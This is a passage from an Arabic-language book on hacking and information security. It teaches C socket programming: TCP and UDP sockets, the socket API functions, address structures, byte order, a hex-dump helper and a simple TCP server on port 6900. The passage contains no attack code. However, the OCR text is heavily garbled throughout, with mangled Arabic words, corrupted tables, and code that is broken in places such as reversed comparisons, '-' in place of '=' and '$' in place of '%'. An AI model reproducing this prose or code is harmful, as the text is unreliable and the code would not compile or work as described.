يقوم بتوصيلها إلينا كمستخدمين GE‏ بروتوكول ال ley ‘TCP‏ عند تصميم برنامج كال Internet Telephony‏ 
فيكون استخدام ال UDP‏ أفضل. وبا ننا لدينا نوعان رئيسيان من بروتوكولات الاتصال .TCP & UDP‏ فلدينا 


أيضاً نوعين رئيسيين من ال c Sockets"‏ نستعرضهم في الصفحة التالية. 
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Stream Sockets 

فكرة عمله أقرب إلى فكرة المكاكة à dul‏ كونها من نوع “Two-way Communication”‏ بمعنى أنه XS‏ 

قتح قناة الإتصال بينهم فسيّمكن GY‏ مِنهُم التحدّث» كذلك يُمكِن GY‏ منهم التأكد Gye‏ الكلام الذي يَسمَعْهُ من 

الطرّف الآخر ob‏ یسأله: هل قلت كذا وكذا؟ ویمکن للآخر أن میب بنعم أو لاء أو أن يُعيد له الكلام Of‏ أراد!.. 

Xy‏ وأنك قد علمت Gh‏ أقصد Of‏ هذا النوع من ال Sockets‏ سيستخدم ال LA WY TCP‏ مُهتمين بإيصال ال 
Packets‏ دون خدوث .!Errors ah‏ 

ولذلك eii‏ استخدام هذا النوع من قنوات الاتصال عندما يقوم مَُصمَحَك Sis‏ بالاتصال بال Mail Servers‏ أو 


à Web Servers‏ آي مکان!. 


Datagram Sockets 
AVE «cul ÍK الأول يشبه‎ OUS فإذا‎ “One-way Communication” هنا يكون الاتصال أقرب إلى فكرة ال‎ 


يُشبه عَمَليّة إرسالك لرسالة عَبرَ البریدا» هل تتذکر عند تجاحك في أحد الإختبارات ddl‏ من 6S «Cisco‏ تقوم 
بطلب الشهادة ك «Hard copy‏ لتنتظر هذا ال US Mail‏ كي يُرسل لك الشهادة» وربا تستغرق رحلة وصوفا إليك 
آکثر من شهر! آلیس كذلك؟» وربا أيضاً يتعثر الامر ولا تصلك شيء!.. هذا آشبه روت وکول ال UDP‏ نه fer‏ ال 
Packets‏ ولا ar‏ لَك الوصول. فتتعلّم من هذا الدرس أن CULE‏ الشّهادات بصِيغة PDF‏ بعد ذلك ced)‏ 
AU ar‏ علیها ©.. 

ما يلي آشکال توضح استخدام ال Stream Socket‏ آثناء عملية اتصال Client ug‏ و Server‏ لاحظ ني الشکل الأول 
ol‏ ال output stream‏ الخاص بالجهاز سيذهب إلى ال z Buffer‏ إلى ال Server‏ على هيئة input‏ والعکس عند انتقال 
ال data‏ من ال Server‏ إلى ال client‏ 
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Understanding Hacking and Information Security المعلومارنه‎ aly القرصنة الإلكترونية‎ 


Server OS Client OS 


Server Process 


Client Process 


local: 10.2.3.4:80 local: 10.3.4.9:4 
remote: 10.3.4.9:4 remote: 10.2.3.4:80 
t n " 8 5 = 9 pe ` input stream 


alll Pont 2324 
L| 


CLIENT PC 
10.1.1.5 
Running T elnet Client 


4-۲ ort 2324 o - 


SOCKETS 


| totes | : 


SERVER MACHINE 
10.1.1.1 
Running Telnet Server on Default Telnet P ort 
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إلى هنا نكون قد انتهينا من هذه المرحلة الأولية. 


والآن سنبدأ SU xo‏ مُستخدمين الأكواد البرمجية. انتبه!» سنعتمد في الفقرات القادمة على الأساسيات التي 


تناولناها في الباب الأول. 
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Socket Functions 


Šis J^‏ ال file access‏ التي شرحناها في الباب السابق؟» ts‏ نستخدم ال identify Jal "file descriptor"‏ لکل 
ملف يتم فتحةٌ وذلك بقيام ال kernel‏ بربط هذه العملية برقم لیکون بمثابة reference‏ ها لدی نظام التشغيل. أيضاً 
ال Sockets‏ تتعامّل بتفس «glad‏ وتستخدم Functions‏ أيضاً لأداء lee‏ ک| كان یستخم ال file access‏ تجموعة 

من ال functions‏ مثل ) write(‏ و ) read(‏ 


^ ^ 
5 


‘Lib في هذه ال‎ Socket التى يَستعملها ال‎ functions ال‎ oid define عمل‎ e 


«Sys/sockets.h» 
/usr/include/sys/socket.h 


مايل أول سطور من هذه ال :Lib‏ 


/* Declarations of socket constants, types, and functions. 


2: Copyright (C) 1991,92,1994-2001,2003,2005,2007 
34 Free Software Foundation, Inc. 
4: This file is part of the GNU C Library. 


هذه بعض ال functions‏ الأساسية الخاصة :Sys/Socket.h Library JU‏ 

مُوضح أسمّل كَل function‏ وظيفتها بطريقة عتَصَرَة. وبا أنه قد تَكَونَت لديك خلفية لا باس بها من الفصل السابق 
فأعتقد أنك gio‏ وظيفتهم بنسبة تتجاوز ال 60% بإذن الله. وسنقوم بتوضيحهم مرة أخرى داخل الأكواد في 
الفقرات القادمة. 


Socket(int domain, int type, int protocol) 
Used to create a new socket, returns a file descriptor for the socket or -1 on error. 
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connect(int fd, struct sockaddr *remote host, socklen t addr length) 
Connects a socket (described by file descriptor fd) to a remote host. Returns 0 on success and -1 
on error. 


bind(int fd, struct sockaddr *local addr, socklen t addr length) 
Binds a socket to a local address so it can listen for incoming connections. Returns 0 on success 
and -1 on error. 


listen(int fd, int backlog queue size) 
Listens for incoming connections and queues connection requests up to backlog queue size. 
Returns 0 on success and -1 on error. 


accept(int fd, sockaddr *remote host, socklen t *addr length) 

Accepts an incoming connection on a bound socket. The address information from the remote 
host is written into the remote host structure, and the actual size of the address structure is 
written into *addr length. 

This function returns a new socket file descriptor to identify the connected 

socket or -1 on error. 


send(int fd, void *buffer, size t n, int flags) 
Sends n bytes from *buffer to socket fd; returns the number of bytes sent or -1 on error. 


recv(int fd, void *buffer, size t n, int flags) 
Receives n bytes from socket fd into *buffer; returns the number of bytes received or -1 on error. 


لاحظ أنه عند إنشاء ال ‘Socket‏ سنقوم بتحديد هذه الأمور: 


Domain 
فمثلاً يمكنك تحديد ما اذا كنت ستتعامل مع 1۳۷4 أم 1۳۷6 آم غيرهم!.‎ Protocol Family وهو نوع ال‎ 
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Type 
.TCP or UDP ما إذا كان‎ Socket Type وتعنی مها ال‎ 


Protocol 


Bale 


سنترکها 0 WY unspecified cere.‏ حَدَدْنا نوع ال protocol‏ في ال Argument‏ الأولى dA‏ 


/bits/socket.h هَذا الّسار:‎ Ge Ú define d ~ protocol families هذه ال‎ 


cb ee deas‏ هذه ال library‏ على ile‏ آجزاء.. 


:protocol families JL بأول جزء» وهو الخاص‎ lad 


/* Protocol families. */ 


#define PF UNSPEC 0 /* Unspecified. */ 

#define PF LOCAL 1 /* Local to host (pipes and file-domain). */ 
#define PF UNIX PF LOCAL /* Old BSD name for PF LOCAL. */ 
#define PF FILE PF LOCAL /* Another nonstandard name for PF LOCAL. */ 
#define PF INET 2 /* IP protocol family. */ 

#define PF AX25 3 /* Amateur Radio AX.25. */ 

#define PF IPX 4 /* Novell Internet Protocol. */ 

*define PF APPLETALK 5 /* Appletalk DDP. */ 

#define PF NETROM 6 /* Amateur radio NetROM. */ 

#define PF BRIDGE 7 /* Multiprotocol bridge. */ 

#define PF ATMPVC 8 /* ATM PVCs. */ 

#define PF X25 9 /* Reserved for X.25 project. */ 

#define PF INET6 10 /* IP version 6. */ 
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ال ء الغاز خاص انو اع ال ‘Sockets‏ 
: في وهو حاص انوع 


e 


/* Types of sockets. */ 
enum Socket type 


1 


SOCK STREAM - 1, /* Sequenced, reliable, connection-based byte 
streams. */ 
#define SOCK STREAM SOCK STREAM 
SOCK_DGRAM = 2, /* Connectionless, unreliable datagrams of fixed 
maximum length. */ 

#define SOCK DGRAM SOCK DGRA 


لاحظ نوعى ال Sockets‏ وهم: 


Stream (TCP) 
Datagram (UDP) 


Socket Address 


كما نعلم أنه لإنشاء قناة الاتصال بين طرفين فنحن بحاجة لأربعة متغيرات أساسية هي: 
Source Address, Source Port, Destination Address, and Destination Port‏ 
تقوم ال functions‏ التى شر حناها بالأعلى بتحديد نوع ال "Socket Address Structure"‏ الذي نحتاجة في عملية 


الاتصال. نقصد Address Structure JU‏ با لامح العامة لل Address‏ المستخدّم» فمثلاً الملامح العامة لل object‏ 
الخاص Address JL‏ 1۳۷4 تكون عبارة عن bits‏ 16 لل WE bitsy «address family‏ لل «IP‏ و bits‏ 16 
Laut‏ لل Port No‏ وهذا a$ abit‏ عن ال object‏ الخاص بال 1۳۷6.. وهكذا مع بقية ال Address Family‏ 


بالتالي تحن Ly‏ إلى Structure‏ ثابت وفارغ!. 
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ils EK]‏ حسّب نوع ال Address Structure‏ الذي Ande asd‏ ذا فا الحل؟. 

سنستخدم ال odd Struct‏ ماه هل SUF‏ الدلو الذي تحدثنا عنه في الباب الاول؟ وکیف bad‏ باستنساخ أشكال 
Age‏ امأ وأطلقنا عليها اسم (Objects)‏ 

دعني دک بمثال ال LS «time.c‏ قد Struct tm L‏ به متغیرات فارغت 3 Lisl‏ منه UR «Object‏ بملئ هذه 
المتغيرات أو ال Elements‏ الموجوده des‏ هذا ال Object‏ 

سَنقوم Lalla‏ باستخدام بعض ال Structs‏ الخاصة Sockets JU‏ وال OSI Layers‏ التي e‏ تعریفها وکتابتها مسقا 


“Struct tm" ال‎ Je à کا فعلنا‎ 


سنشاهد ال Struct‏ العام.. .."sockaddr" bi‏ ع تم تخصيص bytes‏ 16 لف هي BLE‏ عن: 
ie (2 bytes)‏ لل «Address Family‏ وال bytes)‏ 14( المتبقية خصصّت لل .Address Data‏ 


هذا هو شكله: 
sockaddr structure (Generic structure)‏ 


sa data (14 bytes) 


لاحظ عدّد الخانات في الشكل 16 خانة أو bytes‏ 16 


وهذا هو الكود الذي يعبر عنه: 
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/* Get the definition of the macro to define the common sockaddr 
members. */ 


#include «bits/sockaddr.h» 
/* Structure describing a generic socket address. */ 


struct sockaddr 

1 

__ SOCKADDR COMMON (sa ); /* Common data: address family and 
length. */ 

char sa data[14]; /* Address data. */ 

); 


وصلنا لآخر جزء ُریده من هذه ال Lib‏ وهو ال Address Families‏ 


/user/include/bits/socket.h 


/* Address families. */ 


#define AF UNSPEC PF UNSPEC 
#define AF LOCAL PF LOCAL 
#define AF UNIX PF UNIX 
#define AF FILE PF FILE 
#define AF INET PF INET 
#define AF AX25 PF AX25 
#define AF IPX PF IPX 
#define AF APPLETALK PF APPLETALK 
#define AF NETROM PF NETROM 
*define AF BRIDGE PF BRIDGE 
#define AF ATMPVC PF ATMPVC 
#define AF X25 PF X25 
#define AF INET6 PF INET6 


4^5 


لاحظ أن ال Address Family‏ الخامس في الترتيب هو الذي ja‏ عن ال 1۳۷4. 
AF: Address Family, PF: Protocol Family‏ 
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إنتبه له فسنقوم باستخدامه باستمرار بقية الفصل .هذا مثال “Socket Address" J‏ خاص بال 1۳۷4 


/* Structure describing an Internet socket address. */ 
struct sockaddr in 


{ 
___SOCKADDR_ COMMON (sin ); 


in port t sin port; /* Port number. */ 
struct in addr sin addr; /* Internet address. */ 
/* Pad to size of 'struct sockaddr'. */ 


unsigned char sin zero[sizeof (struct sockaddr) - 
. SOCKADDR COMMON SIZE - 
sizeof (in port t) - 
sizeof (struct in addr)]; 


); 


sockaddr structure (Generic structure) 


sa data (14 bytes) 


sockaddr in structure (Used for IP version 4) 


IP address Extra padding (8 bytes) 


هكذا يكون شكله (الشكل الثاني): 


كا تلاحظ .. ol‏ ال Socket‏ الأول هو ال ."General Socket"‏ والثاني هو ال Socket‏ ۰1۳۷4 وكلاهم تشكل مساحة 


os ‘16 bytes‏ هل تلاحظ (xe‏ وجود 8bytes SUE‏ 3( ال Structure‏ اخاص JL‏ 4 مت عنوان 
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- 2 bytes for “family type" 
- and 2 bytes for "port number" 
- and (8 bits * 4 = 32 bits = 4 bytes) for “IP Address" field 


فيكون الجموع bytes‏ 8 فقط !ء oid‏ باکمال الباقي بإضافة Padding‏ 


Big-Endian Byte Ordering 


"AF INET Socket address structure" المستخدمان في ال‎ Port Number وال‎ IP Address أن ال‎ Rz من‎ 


"x-86 little-Endian byte ordering" من ال‎ Yau "Network Byte Ordering" ال‎ oles 


ماهذا ال Endian‏ .€ 


Endianness refers to the order of the Bytes; It also describes the order of byte transmission over a 
digital link. 


Big-endian is the most common format in data networking; fields in the protocols such as IPv4, 
IPv6, TCP, and UDP, are transmitted in big-endian order. 


.."Bits over the link" هنا بحاجَة لارسال‎ tod 
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رید استخدام تقنيات الشبكات!ءوبالتالي LY‏ من oid Convert Jae‏ ال fields‏ التي لن EKE‏ العبور خلال 
الشبكة وهي 3( حالة ال !Little-Endian‏ 

وتتعامل ال Memory‏ مع ال Big-Endian‏ بشكل cabe‏ عن ال Little-Endian‏ كايلٍ: 

في حالة ال |S "Big-Endian ordering"‏ يظهر في الجهة الیمنی: 


فلو آردنا تخزين هذا ال input‏ في الذاكرة فیتم قرائتة من اليسار إلى اليمين. 
The most significant byte (MSB) value, "OA" is at the lowest address‏ 


وني حالة ال "Little-Endian"‏ سيتم قرائته من اليمين إلى اليسار. 
The least significant byte (LSB) value, "0D", is at the lowest address.‏ 


ىا هو موضح في الجهة اليسرى. 


32-bit integer 


OAOBOCOD 


32-bit integer 


Memory OAOBOCOD 


Little-endian 


E Big-endian 
هالك:‎ AL. .. Conversion بعمل هذا ال‎ functions تقوم بعض ال‎ 
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htonl(long value) Host-to-Network Long 
This function converts 32-bit (4-byte) quantities from host byte order to network byte order. htonl means 
host to network long! 


htons(short value) Host-to-Network Short 
This function converts 16-bit (2-byte) quantities from host byte order to network byte order. 


ntohl(long value) Network-to-Host Long 
This function converts 32-bit quantities from network byte order to host byte order. 


ntohs(long value) Network-to-Host Short 
This function converts 16-bit (2-byte) quantities from network byte order to host byte order. 


Conversion between IPv4 and 32-bit int 


عندما نکتب هذه الصيغة 54.208.202.125 Ses‏ والتى "the internet standard dot notation" lle Glas‏ فلن 
يفهمها ال «Socket‏ حيث أن ال CUT functions‏ له تتعامّل order" JL‏ 32-0165" ومن هنا ظهرت الحاجة لتواجد 
functions‏ تقوم بالتحويل من ال ASCI‏ إلى ال "32-bits integer"‏ والعكس!. 


دعنا نلق نظرة على هذه ال functions‏ 


# ال function‏ الأولى: 


inet aton(char *ascii addr, struct in addr *network addr) 


This function converts the specified string in the Internet standard dot notation “*ascii addr” 
to a network address “*network addr”, and stores the address in the structure provided 
"struct in addr". 

The converted address will be in Network Byte Order (bytes ordered from left to right). 
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á 
ae 


32-bits int JI بصيغة‎ IP Address يحمل ال‎ Struct إنه‎ da 455i دعني‎ "struct in_addr هذا ال‎ E. J^ 

«AF. INET الخاص بالعائلة‎ "Socket address structure"! تعريفه داخل‎ 
d* تجده‎ inh alll عنها في‎ pes الذي‎ Structure لل‎ Define تم عمل‎ Address Family for IPv4 وهي ال‎ 
‘Linux في نظام‎ dil re 


uer/include/netinet/in.h 


وقد استخدمناه مُسبقاً عندما قمنا بمقارنته بال ble General Structure‏ معادلة توضح عملية التحويل من ال 
"IP Address in Dotted notation"‏ إلى ال integer‏ 


ol 2 XJ‏ ال Address‏ كما يلي: 


The address is aaa.bbb.ccc.ddd 

فتكون معادلة التحويل کالتالی: 

number = (aaa*256^3) + (bbb*256^2) + (ccc*256^1) + (ddd*256^0) 

أكبر رقم سيكون 4294967295 لأنه الرقم uli‏ لل )255.255.255.255 (Address:‏ وأصغر رقم سيكون )0( 


ene لا‎ 4 unsigned يكون‎ ol Xy integer هذا ال‎ ol لاحظ‎ (Address: 0.0.0.0) لل‎ PR لأنه الرقم‎ 


وجود IP‏ يحمل رقم سالب!. 


# ال function‏ الثانية: 


والتى ستحول من ال Network‏ إلى ال ASCII‏ ستكون على هذا النحو: 
inet ntoa(struct in addr *network addr)‏ 
“This function converts the specified Internet host address to a string in the Internet standard dot‏ 


notation". 
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The error.h 


2. 
| 


axe 453‏ ال Functions‏ التي UF CS‏ استخدمناها في الفصل Gill‏ في مثال ال Heap‏ تحديداً.. 


og $‏ 
احب أن 


" 


fatal( ) وال‎ ec malloc( ) lp! 


// A function to display an error message and then exit 
void fatal(char *message) { 
char error message[100]; 
strcpy(error message, "[!!] Fatal Error "); 
strncat(error message, message, 83); 
perror(error message); 
exit(-1); 


) 


// An error-checked malloc() wrapper function 
void *ec malloc(unsigned int size) { 
void *ptr; 


ptr - malloc(size); 
if(ptr == NULL) 
fatal("in ec malloc() on memory allocation"); 


return ptr; 


با آننا سوف نستخدمهم بشكل مُستمر» فسنقوم بوضعهم في ملف include‏ على حدة إنستدعيهم وقت الحاجة. 
ass‏ عليه error.h‏ 

„$packet analysis لك التعامل مع برامج ال‎ uz 
لديك يتم عرضها‎ a£ JI كارت‎ FE ستلاحظ أن البيانات التي يتم التقاطها‎ TCPDump أو‎ wireshark مثل ال‎ 


2 
^ 


ge iw‏ فَمَثلاً.. ad‏ البّيانات tg,‏ ال Hexadecimal‏ و أيضاً is‏ ال ASCI‏ وهي XXI‏ المقروءة نا 
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00000000 | 4C 00 DC FF 00 00 00 00 3C 00 9F 14 00 EE 10 FD L liy Can 5$ 
00000010 FS FF FA FF FE FF 00 00 01 00 FF FF 00 00 BC 08 Oyuyby yy M 
00000020 | 64 FS 94 06 58 F8 F4 FF 1E 00 22 00 F? FF OF 00 ddl Xeóy " -+y 

00000030 BA FF 00 00 43 61 2F 01 03 OC F1 FD 13 94 87 FF ?y Ca^ fý IH 
00000040 O1 FF 00 65 FF 9B 02 00 94 00 6A FF 46 69 2C OA ¥ eşi 8 1۳1, 

00000050 |02 AD CD 53 33 ED EF 09 CB B4 24 45 14 07 FF F6 15315 ظة ظ‎ yc 
00000060 OF 10 AC FF 43 FF 0C FA FD B3 FS 53 13 ED EF 9 TyCy UFOS ii 
00000070 BD 08 4F AC 05 48 F1 B? OA 50 01 FF FE FS 00 OF % O- HA. P yb8 

00000080 CO AB 26 52 OD FC 12 F8 FC OB FE 00 B3 F5 4E 0B À«&R i ناه‎ p `N 
00000090 | 01 AC B3 22 3F 2F 01 03 OC EE FE 01 B6 BÀ 47 46 | -?"?7 ip TIGE 
o0000040 B? FD 45 OF OF FF FB 06 Fé EA BB 04 4E B? F4 40 -¥E yt oé» N dG 
000000580 12 13 F8 FO C2 9À 15 61 2F 01 03 OC Fl FD 13 4 dêl a^ fý | 


كما ترى فنحن نقوم بتخزين البيانات EAI‏ في ال memory‏ حيث يتم عرضها بصيغة ال Hex‏ وذلك بحد أقصى 
bytes‏ 16 في الصف الواحد» ثم على اليمين نطلب منه إظهار ال "Printable bytes"‏ الط من هذه البیانات أي 


الأحرف أو الرموز المكتوبة بواسطة الكيبورد. والآن سنقوم بكتابة كود صغير يقوم ale‏ الق TERN‏ 


هذا الكود عبارة عن buffer‏ 653 فيه ال RACAT bytes‏ و integer‏ لنضع به ال "length of received bytes"‏ 
کي ترف من خلاله عدد ASÍ bytes JI‏ 

ثم Loop‏ لتقوم 1 ال bytes‏ كي يتسنى لنا عرضها بصفوف لا تتجاوز ال bytes‏ 16 وبصيغة ال Hex‏ ولكن ليست 
تلك ال «96x‏ بل ستکون "$02x"‏ . 

ولماذا استخدمنا هذه الصيغة؟؟. 

2 وهكذا.. ووجود ال )0( هنا قبل ال‎ 2 digits اترك بعدهم مسافة» ثم‎ 5 2 digits هذه الصيغة تعني: إطبع‎ oY 


نعنی به "prepend it with zeros if there is less"‏ وهو اکال الحقول الفارغة بأصفار. 
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ثم نقوم بعمل „s Loop‏ $ انية ولکن لالتقاط ال printable characters‏ کی نظهرها على اليمين كما رأيت!. 


مايق الكود الخاص بال :Dump( ( Gi. Function‏ 


// Dumps raw memory in hex byte and printable split format 
void dump(const unsigned char *data buffer, const unsigned int length) 


{ 


unsigned char byte; 
unsigned int i, j; 
for(i=0; i < length; i++) { 
byte = data buffer[i]; 
printf ("%02x ", data_buffer[i]); // Display byte in hex. 
if (((1%16)==15) || (i==length-1)) { 
for (j=0; j > 15-(i$16); j++) 
DERTE Y; 
printf("| "); 
for(je(i-(i$16)); j <= i; j++) { //Display printable bytes from line. 
byte = data_buffer[j]; 
if((byte > 31) && (byte < 127)) // Outside printable char range 


[9 


printf("$c", byte); 


else 


h}‏ بط سرد اج 
} 
printf ("Nn"); // End of the dump line (each line is 16 bytes)‏ 
End if‏ // } 
End for‏ // } 


ph “Two Parameters” تأخل‎ function هذه‎ 
هو‎ GUI البيانات الذي سنتوقع استقبالحاء‎ e$ سنقوم بتحديد مساحته نحن بناء على‎ "pointer to a buffer" الأول‎ 
Loop إلى ال‎ dea pe "received ... of bytes" رسالة‎ WJ لیطبع‎ bytes ال‎ LUG حجم‎ count بعمل‎ e jJ integer 
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لنقوم ds,‏ ال bytes‏ من أجل عرضها على الشاشة» وكا US‏ مسبقاً أننا بحاجة لعرضهم بصيغة ال Hex‏ وبحد أقصى 
bytes‏ 16 في الصف الواحد.. 
الأخير هذا يُعتبر شرطاً!ء أليس کذلك؟ فسنستخدم له دالة 18 لتقوم لنا بأمرين: 

"two spaces" (Lua بمقدار‎ "two digits" JS الأول: ستقوم بعمل فصل بین‎ om 

" الثاني: عندما يكتول ال byte‏ رقم 16 ستقوم بوضع الرمز "|" متبوع ب Lai "two spaces"‏ کا هو موضح 


في الکود. 


والآن ماذا عن ال {Printable data‏ وهى التى Fa‏ بجانب ال bytes of Hex"‏ 16". 
سنقوم tal‏ بعمل Loop‏ أخر ى داخل ois‏ ال bytes‏ لتلتقط منها ال printable characters‏ 


ولكن ما هذا الشرط الغير مألوف! 


if((byte » 31) && (byte > 127)) 


ماذا نعني بأكبر من 31 و أصغر من $127 

هذا شرط تحدد UJ‏ عدم طباعة العناصر التي تقع خارج هذا ال range‏ من ال character‏ وإذا صادفت عناصر خارج 
هذا النطاق» فلن تقوم بعرضها!ء ولكن ستطبع بدلاً منها C)‏ فقط. 

نعم.. ولكن ما هذه ال 127 بأي حال؟ 

ASCII table ال‎ L! 


ASCII, abbreviated from American Standard Code for Information Interchange, is a character- 
encoding scheme. ASCII codes represent text in computers, communications equipment, and 
other devices that use text. Most modern character-encoding schemes are based on ASCII, 
though they support many additional characters. 
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Understanding Hacking and Information Security المعلومات‎ aly القرصنة الإلكترونية‎ 


وهذا ال table‏ الخاص ee‏ هذا يوضح لنا أكثر الشرط المذكور في دالة f)‏ 


Dec Hex Oct Chr Dec Hex Oct HTML Chr Dec Hex Oct HTML Chr Dec Hex Oct HTML Chr 
00 000 ; > © 40 &#096; 
11 001 Start of Header ! A 141 &#097; a 
22 002 Start of Text Ws 102 &#066; B 142 &4098; b 
33 003 End of Text ; 103 &#067; C 143 &#099; c 
44 004 End of Transmission ۳ 104 &4068; D 144 &#100; d 
55 005 Enquiry : 105 &4069; E 145 &#101; e 
66 006 Acknowledgment 5 106 &#070; ع‎ 146 854102; f 
77 007 Bell : 107 &#071; G 147 &#103; و‎ 
88 010 Backspace H 110 84072; H 150 &#104; h 
99 011 Horizontal Tab í 111 &#073; I 151 &#105; i 

10A 012 Line feed : 112 84074; ل‎ 152 &#106; j 
11B 013 Vertical Tab F 113 &#075; K 153 85107; k 
12C 014 Form feed : 114 &#076; L 154 &#108; | 
13D 015 Carriage return j 115 84077; M 155 84109; m 
14E 016 ShiftOut ۳ 116 &#078; N 156 &#110; n 
15۲ 017 ShiftIn y 117 &#079; O 157 &#111; o 
1610 020 Data Link Escape 0 120 &#080; P 160 854112; p 
1711 021 Device Control 1 1 121 &#081; © 161 &#113; q 
1812 022 Device Control 2 2 122 &#082; R 162 &#114; r 
1913 023 Device Control 3 3 123 &#083; S 163 &#115; s 
2014 024 Device Control 4 4 124 &4084; T 164 &#116; t 
2115 025 Negative Ack. 5 125 &#085; U 165 85117; u 
2216 026 Synchronous idle 6 126 &#086; V 166 854118; v 
2317 027 End of Trans. Block 7 127 84087; W 167 854119; w 
2418 030 Cancel 8 130 &#088; X 170 &#120; x 
2519 031 End of Medium 9 131 &#089; Y 17185121; y 
26 1A 032 Substitute 3 132 &4090; 7 172 845122; z 
27 1B 033 Escape 2 133 &4091; ۲ 173 85123; ( 
28 1C 034 File Separator < 134 &#092; \ 174 &#124; | 
29 1D 035 Group Separator = 135 &#093; ] 175 &#125; ) 
30 1E 036 Record Separator > 136 84094; ^ 176 &#126; - 
311F 037 Unit Separator &#063; ? 137 84095; — 177 88127; Del 


asciicharstable.com 


لقد USI‏ الشرط لیقوم بطباعة ال pl characters‏ 3331 بين ال )531 127( Sed‏ 127 تعني Del‏ في الكيبورد» D s‏ 


لا ريده في تتائج الكود!. ولکن إذا eb‏ في ال bytes‏ فسنقوم بطباعة Aa NS (dot)‏ 
سنقوم بإضافة هذه ال Laf function‏ إلى الملف error.h‏ .. فسيتم استخدامها بشکل مُتکرر. 
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Some Definitions 


3 


wr 


2 
| 


هنا حب أن أتحدث عنهم قبل الانتهاء من هذه الفقره 3 هم ال Function Prototype‏ و ال Define‏ ? 


Function prototype 
:" function prototype" هذا تعريف ال‎ 


a function prototype or function interface is a declaration of a function that specifies the 
function's name and type signature (parameter types, and return type), but omits the function 
body. While a function definition specifies how the function does what it does (the 
"implementation"), a function prototype specifies its interface. 

لقد استخدمناه مُسبقاً في بعض col SV‏ سأوضح لك ما يعنيه بمثال: 
Consider the following function prototypes:‏ 
int myfunction(int n);‏ 


This prototype specifies that in this program, there is a function named "myfunction" which 
takes a single integer argument "n" and returns an integer. 


وفي مكانٍ ما داخل البرنامج سيتم Us‏ 4 هذه ال function‏ الفعلية!. 


#Define 
453 variable أيضاً سنستخدمه فى الأكواد القادمة» هو فى الحقيقة 422 ال‎ ate ک| يُطلقون‎ Directive هذا ال‎ 
: دمه وي هو في احقيقة يس‎ : 


كذلك!» Íb‏ يمكن للبرنامج أن يتحكم في قيمته باستمرار» بینا الآخر "constant name" j£»‏ فال #define‏ 


هذا SEG‏ من استخدام هذا ال const value‏ في أي مكان داخل الکود فَمَثْلاً عندّما 365 port‏ بعينه لتستقبل 
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الإتصال cade‏ فَسَنقوم define | s.‏ ذا ال port‏ في بداية البرنامج ا بالآتي: "متى ما وجدت لفظة port‏ فم 


باستبدالا برقوه"» وهو مثلاً 3544 كما يلي: 
#define port 3544‏ 


لقد OYI Lael‏ جاهزين لاستقبال الفقرة القادمة.. 


سنقوم بطرح مثال عملي باستخدام ال ."Socket functions"‏ 


Server Example 


في هذا المثال سنقوم بكتابة كود est Server J‏ بانتظار ال session‏ من ال client‏ وفقاً لمايل: 
The server listens for TCP connections on port 6900, and when a client connects,‏ 
it (the server) sends a message "Hello, Server".‏ 
يبدأ باستقبال Data‏ من 148 ال client‏ إلى أن 3e ex‏ ال connection‏ 


A 
os 


#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include "error.h" 
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#define PORT 6900 // The port users will be connecting to 


int main(void) { 
int sockfd, new sockfd; //Listen on sock fd, new connection on new fd 
struct sockaddr in host addr, client addr; //My address information 
Socklen t sin size; 
int recv length-1, yes-1; 
char buffer[1024]; 


if ((sockfd = socket(PF INET, SOCK STREAM, 0)) == -1) 


fatal("in socket"); 


if (setsockopt(sockfd, SOL SOCKET, SO REUSEADDR, &yes, 
Sizeof(int)) == -1) 
fatal("setting socket option SO REUSEADDR"); 


host addr.sin family - AF INET; //Host byte order 

host addr.sin port - htons(PORT); //Short, network byte order 

host addr.sin addr.s addr = 0; // Automatically fill with my IP 
memset(&(host addr.sin zero), '\0', 8); //Zerothe rest of the struct. 


if (bind(sockfd, (struct sockaddr *)&host addr, sizeof(struct 
sockaddr)) == -1) 
fatal("binding to socket"); 


if (listen(sockfd, 5) == -1) 
fatal("listening on socket"); 


while(1) { // Accept loop. 
sin size = sizeof (struct sockaddr in); 
new sockfd = accept(sockfd, (struct sockaddr *)&client addr, 
&sin size); 


if(new sockfd -- -1) 
fatal("accepting connection"); 
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printf("server: got connection from 55 port %d\n", 
inet ntoa(client addr.sin addr), 
ntohs(client addr.sin port)); 


send (new sockrd, "Hello, serverin", 13, 0); 
recv length - recv(new sockfd, &buffer, 1024, 0); 
while(recv length > 0) { 
printf ("RECV: $d bytes\n", recv length); 
dump (buffer, recv length); 
recv length = recv(new sockfd, &buffer, 1024, 0); 


) 


close(new sockfd); 


) 


return 0; 


) 


لنبداً بتوضيح ما يحدّث!: 
قمنا باضافة اللف #include "error.h"‏ کی نتمکن من استدعاء ی من الثلاث juli functions‏ إليهم 


.6900 وهو‎ "port whom our server is listening on" لتحدد ال‎ #define استخدمنا ال‎ m Tes 


ماذا نقصد ببذه العبارة: int sockfd, new sockfd;‏ € 
هل تذ گر ال file descriptor‏ . 
Pr‏ أن أى ملف يتم Socket LER‏ يتم ]5023 0 سيؤدي إلى حدوث Entry‏ داخل ال «kernel‏ هذا ال entry‏ 


pes‏ عنه برقم ۲ يسمى ال «fd‏ هذا الرقم أو ال (Entry)‏ يستخدم ك lid reference‏ ال Socket‏ أو Call!‏ الذي 
هذا da‏ ..ولكن ما فائدة ال fd‏ الثاني؟ 
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(ey "Listening for incoming connection" ال‎ ilie الأول أثناء‎ fd ال‎ eds ul قد‎ WY سوف تحتاجه‎ 

سنحتاج ل fd‏ جدید. eres‏ أننا entry com‏ أخرى داخل ال kernel‏ خاصة ذه ال process‏ الجديدة وهی ال 
Ay TAA ۰ E‏ 

0 الذي سیحدث!. 


A 


م قمنا يتعريف ال objects‏ التي رید حيث bad‏ باشتقاقها Sa‏ ال Struct‏ العام كما ترى: 


2 


struct sockaddr in host addr, client addr; 


» 4 » AU Wave E ^ "p Se wae 
Se لبعض المتغيرات»‎ declare | ex ثم قمنا‎ -general structure ال‎ ce de تذکر آن کلاهم‎ 


: Arguments ..ستحتاج منا ثلاثة‎ socket( ( وهی ال‎ function( ) J لاو‎ go 


= Protocol family: 4 
= Socket type: Stream (TCP) 
=" Number of protocols inside this family: 0 there is only one protocol! IPv4 


هذه ال function‏ ترجع نا قيمة int‏ هی ال fd‏ الخاص ذا ال est socket‏ بتخزینها هنا "sockfd"‏ بالطبع 
سیحدث call‏ لل ( )10081 في حال [ES‏ العملية كا هو ó‏ في الکود. $& gael‏ لل function‏ التالية وهي 


setsockopt( )‏ لنحدد من ie options JI AYE‏ ذا ال .socket‏ هذه ال options‏ وغيرها موجودة على السار 


/user/include/asm/socket.h 


